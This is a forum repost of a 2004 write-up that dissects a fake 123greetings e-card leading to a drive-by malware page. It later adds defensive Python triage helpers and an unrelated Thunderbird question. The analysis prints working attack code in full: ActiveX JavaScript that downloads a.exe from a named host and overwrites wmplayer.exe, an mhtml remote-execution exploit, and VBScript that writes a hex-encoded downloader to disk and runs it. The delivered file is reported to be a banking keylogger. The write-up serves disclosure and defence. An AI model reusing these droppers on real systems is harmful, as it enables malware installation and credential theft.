Beware E-card Hijack Spam Scam


MikeHunt

E-card Hijack Spam

Introduction

I got an email on February 15th, 2004 telling me I had received an e-card from someone at 123greetings.com. The email looked a little bit suspicious, since the sender of the ecard ([email protected]) was someone I didn't recognize, and the URL to view the card showed the root domain of 123greetings.com. However, being the lonely geek I am, I clicked on the link hoping that I had a secret admirer who had emailed me a card for Valentine's Day...

The page opened in my browser, but nothing happened. Lucky for me, I wasn't using Internet Explorer so I was saved. A closer look at the email and URL revealed the following:

It has been pointed out to me that the email says that you sent a card, not received one. I should have noticed this and realized I hadn't sent any cards to anyone.

The E-mail

There are several things to notice about the following email. Starting at the beginning, the email was sent from a DSL account in Poland - definitely did not come from the 123greetings.com servers. The from, reply-to, sender and return-path headers are obviously fake.

A comment in the HTML content of the email shows that it was saved from http://d40921.u24.whp-server.com/card.htm, where a copy of what is presumably the original email still exists. The title tag is set to "Untitled Document", and a META tag indicates that the HTML was generated using a Microsoft product.

The URL view-source:http://210.192.42.34/img/ [warning, don't click unless you know what you're doing] appears through the rest of the email. All the links have been changed to point to this URL, and a 0x0 iframe at the end of the email also opens it up.

From [email protected] Sun Feb 15 11:13:52 2004
Return-Path:
Delivered-To: MYEMAIL
Received: from localhost (localhost [127.0.0.1]) by mail.tjhsst.edu
    (Postfix) with ESMTP id 99462A2C1A for ; Sun, 15 Feb
    2004 11:13:52 -0500 (EST)
Received: from mail.tjhsst.edu ([127.0.0.1]) by localhost (macaroni
    [127.0.0.1]) (amavisd-new, port 20025) with ESMTP id 01846-06 for
    ; Sun, 15 Feb 2004 11:13:52 -0500 (EST)
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by
    mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19 for ;
    Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
    by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for
    ; Sun, 15 Feb 2004 11:13:48 -0500 (EST)
Date: Sun, 15 Feb 2004 16:16:50 +0000
From: Ecard
Subject: You have received E-card at 123Greetings.com
To: ME
Message-ID:
Reply-To: Ecard
Sender: Ecard
MIME-Version: 1.0
Content-Type: text/html; charset=Windows-1251
X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at macaroni
X-Spam-Status: No, hits=4.3 tagged_above=2.0 required=6.3 tests=HTML_30_40,
    HTML_COMMENT_SAVED_URL, HTML_MESSAGE, HTML_RELAYING_FRAME,
    HTML_TITLE_UNTITLED, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,
    RCVD_FAKE_HELO_DOTCOM
X-Spam-Level: ****
Content-Transfer-Encoding: 8bit

<!-- saved from url=(0041)http://d40921.u24.whp-server.com/card.htm -->
Untitled Document

Dear Admirer,

Your e-card has been sent to My... at [email protected]

123Greetings.com is all about touching lives, bridging distances, healing rifts
and building bonds. We have a gallery of e-cards for almost every occasion of
life. Express yourself to your friends and family by sending Free e-cards from
our site with your choice of colors, words and music.

Your e-card will be available with us for the next 30 days. If you wish to keep
the e-card longer, you may save it on your computer or take a print.

To view a copy of the e-card you have sent, choose from any of the following
options:

--------
OPTION 1
--------
Click on the following Internet address or
copy & paste it into your browser's address box.

http://www.123greetings.com/

--------
OPTION 2
--------
Copy & paste the e-card number in the "View Your Card" box at
http://ww.123greetings.com/

Your e-card number is
7CU20121085738151

If you need help in viewing your e-card or any other assistance,
please visit our Help / FAQ section located at
http://ww.123greetings.com/help/

If you need further help, feel free to write to us at
mailto:%[email protected]

Best wishes,
Postmaster,
123Greetings.com

*If you would like to send someone an e-card, you can do so at
http://ww.123greetings.com/

The Offending URL

The URL, whose HTML source is reproduced below, does some really nasty stuff. Using iframes, object tags and javascript, it opens up several other files, which are explained later on, from the server:

* view-source:http://210.192.42.34/img/spy.htm

* view-source:http://210.192.42.34/img/start.html

* view-source:http://210.192.42.34/img/ro.htm

* view-source:http://210.192.42.34/img/1.php

In addition to opening other URLs, the page also does its own share of nasty things. It includes a hidden textarea which contains ActiveX to download a certain a.exe, and overwrite the Windows Media Player wmplayer.exe with it. Once the file has been replaced, IE is redirected to the mms://, which causes the invocation of wmplayer.exe. The code in this textarea is processed by some javascript after a 5 second timeout, and is run in Internet Explorer's 'Media Sidebar'. Before this 5 second timeout, however, a fake url, error.jsp, is opened in the media sidebar to throw off the user.

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

<script language="javascript">
function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    // the loop bound and the [i] index were swallowed by the forum's markup; restored here
    for (i = 0; i < lines.length; i++) {
        line = lines[i];
        line = line.replace(/^\s+/,"");
        line = line.replace(/\s+$/,"");
        line = line.replace(/'/g,"\\'");
        line = line.replace(/[\\]/g,"\\\\");
        line = line.replace(/[/]/g,"%2f");
        if (line != '') {
            result += line +'\\r\\n';
        }
    }
    return result;
}

function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:java script:eval('" + mycode + "')";
    window.open(myURL,"_media")
}

window.open("error.jsp","_media");
setTimeout("doit()", 5000);

spy.htm - I wonder what this does?

Despite its malicious-sounding name, all this file contains is the tracking code provided by a Russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.

<!-- SpyLOG f:0211 -->
<script language="javascript"><!--
Mu="u5327.08.spylog.com";Md=document;Mnv=navigator;Mp=0;
Md.cookie="b=b";Mc=0;if(Md.cookie)Mc=1;Mrn=Math.random();
Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;Mt=(new Date()).getTimezoneOffset();
Mz="p="+Mp+"&rn="+Mrn+"&c="+Mc+"&t="+Mt;
if(self!=top){Mfr=1;}else{Mfr=0;}Msl="1.0";
//--><script language="javascript1.1"><!--
Mpl="";Msl="1.1";Mj = (Mnv.javaEnabled()?"Y":"N");Mz+='&j='+Mj;
//--><script language="javascript1.2"><!--
Msl="1.2";Ms=screen;Mpx=(Mn==0)?Ms.colorDepth:Ms.pixelDepth;
Mz+="&wh="+Ms.width+'x'+Ms.height+"&px="+Mpx;
//--><script language="javascript1.3"><!--
Msl="1.3";//--><script language="javascript"><!--
My="";My+="";
My+="http:";
My+="";Md.write(My);//-->
cnt?cid=532708&p=0
<!-- SpyLOG -->

start.html - The file that ran away

Presumably, this file actually existed at one point, and did something (maybe changed the browsers start page?), but it no longer exists.

<em>404 Not Found</em>
Not Found
The requested URL /img/start.html was not found on this server.
Apache/1.3.12 Server at panda.coventive.com Port 80

ro.html - Remote execution

The author tries yet another IE exploit to run a.exe remotely.

<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
    //One more fresh action is present for more stable performance
    for(i=1;i
    w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
    w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
    w.document.write("
    CLASSID='CLSID:11111111-1111-1111-1111-111111111113'
    CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
    setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://adversting.co.uk/a.exe")

HijackClickV2-MyPage

1.php - Last Attempt

1.php tries one last method to run a.exe. The file contains VBScript code, but probably uses PHP so that it can send an 'application/hta' content-type header. The encoded VBScript has been removed (view it at view-source:http://210.192.42.34/img/1.php) and replaced with the decoded version of the code.

The vbscript code contains strings which represent, in hex, the binary contents of a certain executable which is saved as x.exe. Once saved, this executable is launched with the url to a.exe as an argument.

<script language=vbs>
szURL = "http://adversting.co.uk/a.exe"
<script language="VBScript.Encode">
szZeroLine = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000"
szBinary = szBinary & "000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F"
szBinary = szBinary & "742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21"
szBinary = szBinary & "97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300"
szBinary = szBinary & "AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000"
szBinary = szBinary & "001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000"
szBinary = szBinary & "000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine
szBinary = szBinary & "2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000"
szBinary = szBinary & "BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000"
szBinary = szBinary & "0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000"
szBinary = szBinary & "00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020"
szBinary = szBinary & "4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000"
szBinary = szBinary & "0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072"
szBinary = szBinary & "6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164"
szBinary = szBinary & "4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F"
szBinary = szBinary & "776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000"

szApplication = "c:\x.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
intLength = len(szBinary)
intPosition = 1
' hex pairs are turned back into bytes and written to c:\x.exe;
' the loop condition was truncated by the forum's markup and is restored here
while intPosition < intLength
    char = Int("&H" & Mid(szBinary, intPosition, 2))
    hFile.Write(Chr(char))
    intPosition = intPosition+2
wend
hFile.Close
' x.exe is started with the a.exe URL as its only argument
Set hShell=CreateObject("WScript.Shell")
hShell.run(szApplication+" "+szURL)
%>

x.exe - The Accomplice

I don't have a Windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free, and be sure to email me anything you find so that I can update this page.

Feb 16th, 12PM: According to Robert Myers, x.exe isn't a valid Windows executable, and doesn't run properly on either XP or 98. Looking at the raw binary, the intent is to simply download the URL given on the command line and execute it. It should download a.exe, call it c:\y.exe and run it.

Feb 16th, 3PM: Slashdot reader James Sneeringer emailed me the following update:

As you know, 1.php decodes into x.exe. It's quite small, only 2512 bytes. When run, it evidently attempts to download whatever URL is passed to it (using URLDownloadToFileA()) and saves it to c:\y.exe, then tries to run it (using WinExec()). So x.exe downloads a.exe as y.exe and runs it.

I obtained a.exe from the URL in 1.php, http://adversting.co.uk/a.exe. The a.exe file appears to be a keylogger, as the string "key.log" is contained in it. It contains calls to RegCreateKeyExA(), MessageBoxA(), and InternetOpenA(), so it probably does the usual trojan/worm thing... ensures it starts up on reboot, prints misleading error messages, phones home, etc.

I have not run any of these programs. I have only analyzed them on a Linux system using the strings command. I did copy a.exe to a Windows system running Norton AntiVirus, but it didn't flag it as any known Trojan or SpyWare. I obtained x.exe by converting the VBScript code to perl. I hope this helps.

a.exe - Final Destination

Feb 16th, 3:30PM: I've gotten several emails providing information about a.exe (md5sum e8262377158e2b0b3932292f49fd23a6).

Robert Myers reports that the exe has references to spy.dll and keylg.dll

John reports:

I analyzed the a.exe and found disturbing info: it is after banks, as described in an unpacked version (the file is compacted). Bank list is as follows:


The files it installs are:
C:\WINDOWS\SYSTEM\~key.log keylogging file ?
C:\WINDOWS\SYSTEM\~post.log other post file ?

Files it refers to:
spy.dll
klgd.dll

Interesting info about the author:
g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb
g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb
ProgLib.dll._Prog_HookAllApps@12
MoneyFtp (???)

The information (logfiles) is sent out to an FTP site that is UP as of yet. I informed the abuse department of the hosters of the FTP site and am giving them a chance to shut it down. It is not yet wise to include this particular information on your site, as there could be consequences for the people whose log is already collected.

And Jack emailed me:

I downloaded a.exe out of curiosity, and have been analysing it. The file contains a number of very interesting strings, which make it quite obvious that this program attempts to hijack the user's personal login information as they log in to various popular Internet banking services.

The strings are (trivially) encrypted. However, once every character in a.exe is XOR'ed with 255, they appear. I have listed them below.

Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE.


I have found this very scary. I cannot believe how openly malicious this

program actually is.

adversting.co.uk - Look, it's misspelt

Feb 16th, 12PM: Mike Richards did some research on the domain that a.exe is being pulled from. Here's what he found:

The site is registered in the UK and points to another mass marketing company called trafficdiscount.com. They are located in the US and their registration details are:

Registrant Name: Daniel Belcher
Registrant Organization: Slick Website Development
Registrant Address: 1111 Kathryn Rd.
Registrant City: Mt. Juliet
Registrant State/Province: TN
Registrant Postal Code: 37122
Registrant Country: US
Registrant Phone Number: +61.54434190
Registrant Fax Number: +.
Registrant Email: [email protected]

They are currently providing services through Wiltel.

Conclusion

If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest Firefox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

This page was created in vim by Aman Gupta with no crazy standards compliance in mind, but rather a desire to write clean, readable and well organized HTML using CSS to make the page look presentable.
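A header-chain audit of the kind the E-mail section above does by hand, as an added Python example (not code from the original page): it unfolds the headers, walks the Received lines back to the originating hop, and flags the HELO/reverse-DNS mismatch, the From: domain that never appears on the relay path, and the consumer-DSL naming of the first hop. The sample headers are a constructed copy of the quoted chain with the mailbox and sender addresses replaced by placeholders.

```python
import re

# Constructed sample modelled on the header chain quoted in the post above:
# same relay names and IPs, but the recipient mailbox and the forged sender
# address are made-up placeholders (the post redacts both).
SAMPLE_HEADERS = """\
Received: from localhost (localhost [127.0.0.1]) by mail.example.edu
    (Postfix) with ESMTP id 99462A2C1A for <me@example.edu>; Sun, 15 Feb
    2004 11:13:52 -0500 (EST)
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by
    mail.example.edu (Postfix) with ESMTP id AF227A2C19 for <me@example.edu>;
    Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
    by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for <me@example.edu>;
    Sun, 15 Feb 2004 11:13:48 -0500 (EST)
From: Ecard <ecard@123greetings.com>
Subject: You have received E-card at 123Greetings.com
"""

def unfold_headers(raw):
    """Join RFC 2822 folded continuation lines; return [(name, value), ...]."""
    fields = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            fields.append((name.strip().lower(), value.strip()))
    return fields

RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>\S+)\s+\[(?P<ip>[\d.]+)\]\)\s+by\s+(?P<by>\S+)")

def relay_path(fields):
    """Each relay prepends its own Received line, so reversing the list gives
    delivery order with the originating host first."""
    hops = [RECEIVED_RE.search(v) for n, v in fields if n == "received"]
    return [m.groupdict() for m in reversed(hops) if m]

def registered_domain(host):
    """Last two labels: enough to compare compuserve.com against tpnet.pl."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def audit(raw):
    fields = unfold_headers(raw)
    hops = relay_path(fields)
    origin = hops[0]
    from_hdr = dict(fields).get("from", "")
    m = re.search(r"@([\w.-]+)", from_hdr)
    from_domain = m.group(1).lower() if m else ""
    findings = []
    # HELO claims one domain, reverse DNS says another (cf. RCVD_FAKE_HELO_DOTCOM)
    if registered_domain(origin["helo"]) != registered_domain(origin["rdns"]):
        findings.append("helo_rdns_mismatch")
    # the From: domain is absent from every hop on the relay path
    if from_domain and not any(from_domain in h["rdns"] or from_domain in h["by"] for h in hops):
        findings.append("from_domain_not_in_path")
    # consumer DSL/dial-up naming on the first hop, not a greeting-card farm
    if re.search(r"adsl|dsl|dial|dyn|ppp", origin["rdns"], re.I):
        findings.append("origin_looks_dynamic")
    return {"origin_ip": origin["ip"], "origin_rdns": origin["rdns"],
            "from_domain": from_domain, "findings": findings}
```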

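The hex-to-file loop in 1.php and the XOR-with-255 string recovery Jack describes, as one added Python triage helper (not the page's or its contributors' code): it statically replays the szBinary concatenation the way the analysts did with perl, checks the MZ/PE header, and runs a strings pass over both the raw and the XOR-0xFF view. The VBScript it parses is a constructed, inert stand-in in the same idiom, not the real x.exe bytes.

```python
import re
import struct

# Constructed stand-in for the szBinary assembly in 1.php: the same VBScript
# idiom (a szZeroLine pad, hex chunks appended with &), but a hand-made 104-byte
# blob, not the real x.exe. It holds an MZ stub whose e_lfanew points at
# "PE\0\0", two plain strings, and one string XORed with 0xFF ("key.log").
SAMPLE_VBS = '''
szZeroLine = "00000000000000000000000000000000"
szBinary = ""
szBinary = szBinary & "4D5A900003000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000" & "40000000"
szBinary = szBinary & "50450000"
szBinary = szBinary & "55524C446F776E6C6F6164546F46696C654100"
szBinary = szBinary & "633A5C792E65786500"
szBinary = szBinary & "949A86D1939098FF"
'''

def decode_vbs_hex(vbs, target="szBinary"):
    """Replay the dropper's string building statically (resolve hex constants,
    expand 'x = x & ...' appends, hex-decode) instead of letting it write c:\\x.exe."""
    consts = {}
    for line in vbs.splitlines():
        m = re.match(r"\s*(\w+)\s*=\s*(.*)", line)
        if not m:
            continue
        name, expr = m.groups()
        chunks = []
        for hexlit, ident in re.findall(r'"([0-9A-Fa-f]*)"|(\w+)', expr):
            if ident == name:            # the self-reference in 'x = x & ...'
                continue
            chunks.append(consts.get(ident, "") if ident else hexlit)
        appending = name in re.findall(r"\w+", expr)
        consts[name] = (consts.get(name, "") if appending else "") + "".join(chunks)
    return bytes.fromhex(consts[target])

def looks_like_pe(blob):
    """MZ magic present and e_lfanew (offset 0x3C) lands on the PE signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def ascii_strings(data, min_len=4):
    """What strings(1) reports: runs of printable ASCII of at least min_len."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def xor_strings(data, key=0xFF, min_len=4):
    """Same scan after XORing every byte with key; 0xFF is the trivial
    obfuscation Jack reports in a.exe."""
    return ascii_strings(bytes(b ^ key for b in data), min_len)

def triage(vbs):
    blob = decode_vbs_hex(vbs)
    return {"size": len(blob),
            "pe_header_ok": looks_like_pe(blob),
            "strings": ascii_strings(blob),
            "xor_ff_strings": xor_strings(blob)}
```

Pointing decode_vbs_hex at the real 1.php text would give the 2512-byte x.exe James Sneeringer describes without ever executing the script.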

Anybody know how to change the SMTP server in Thunderbird?? It's in the advanced tab in 'server settings' for the mail account but doesn't seem to have an option for adding a new one. Heyulp!

Edit: oops ! meant to post that in tech talk ... soz

